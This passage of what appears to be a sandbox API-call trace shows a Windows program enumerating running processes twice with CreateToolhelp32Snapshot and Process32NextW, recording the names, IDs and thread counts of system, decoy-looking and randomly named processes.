th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.207] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.209] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0137.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.225] CloseHandle (hObject=0xc4) returned 1 [0137.225] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.231] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.333] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.334] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.337] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0137.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0137.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, 